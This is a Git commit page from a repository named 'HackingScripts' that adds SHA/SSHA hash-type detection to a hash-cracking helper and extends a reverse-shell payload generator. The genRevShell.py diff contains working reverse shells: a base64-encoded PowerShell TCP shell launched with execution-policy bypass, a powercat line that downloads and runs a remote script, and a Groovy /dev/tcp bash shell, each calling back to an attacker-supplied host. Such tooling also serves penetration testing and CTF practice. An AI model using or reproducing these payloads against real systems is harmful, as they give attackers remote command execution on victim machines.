Roman/HackingScripts
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

SSHA/SHA hash types + powershell reverse shell

Browse Source
This commit is contained in:
Roman Hergenreder 2021-10-11 17:08:44 +02:00
parent 3a0a75e278
commit 2f555c5b9e
2 changed files with 16 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
crack_hash.py
View File

@ -25,6 +25,8 @@ class HashType(enum.Enum):
RAW_SHA1 = 100
SHA1_PASS_SALT = 110
SHA1_SALT_PASS = 120
SHA1 = 101
SSHA1 = 111
# SHA2
RAW_SHA2_224 = 1300
@ -123,6 +125,14 @@ class Hash:
elif "$" in raw_hash and raw_hash.startswith("pbkdf2_sha256$"):
self.type.append(HashType.DJANGO_PBKDF2_SHA256)
else:
m = re.match("^\{([^}]*)\}.*$", raw_hash)
if m:
hash_type = m[1]
if hash_type == "SHA":
self.type.append(HashType.SHA1)
elif hash_type == "SSHA":
self.type.append(HashType.SSHA1)
if ":" in raw_hash:
parts = raw_hash.split(":")
if len(parts) == 2:

8
genRevShell.py
View File

@ -7,7 +7,7 @@ import util
import time
import threading
import readline
import base64
def generatePayload(type, local_address, port):
@ -29,8 +29,12 @@ def generatePayload(type, local_address, port):
return "r = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/%s/%d;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\np.waitFor()" % (local_address, port)
elif type == "xterm":
return "xterm -display %s:1" % (local_address)
elif type == "powercat" or type == "powershell":
elif type == "powercat":
return "powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://%s/powercat.ps1');powercat -c %s -p %d -e cmd\"" % (local_address, local_address, port)
elif type == "powershell":
payload = '$a=New-Object System.Net.Sockets.TCPClient("%s",%d);$d=$a.GetStream();[byte[]]$k=0..65535|%%{0};while(($i=$d.Read($k,0,$k.Length)) -ne 0){;$o=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($k,0,$i);$q=(iex $o 2>&1|Out-String);$c=$q+"$ ";$b=([text.encoding]::ASCII).GetBytes($c);$d.Write($b,0,$b.Length);$d.Flush()};$a.Close();' % (local_address, port)
payload_encoded = base64.b64encode(payload.encode("UTF-16LE")).decode()
return f"powershell.exe -exec bypass -enc {payload_encoded}"
def triggerShell(func, port):
def _wait_and_exec():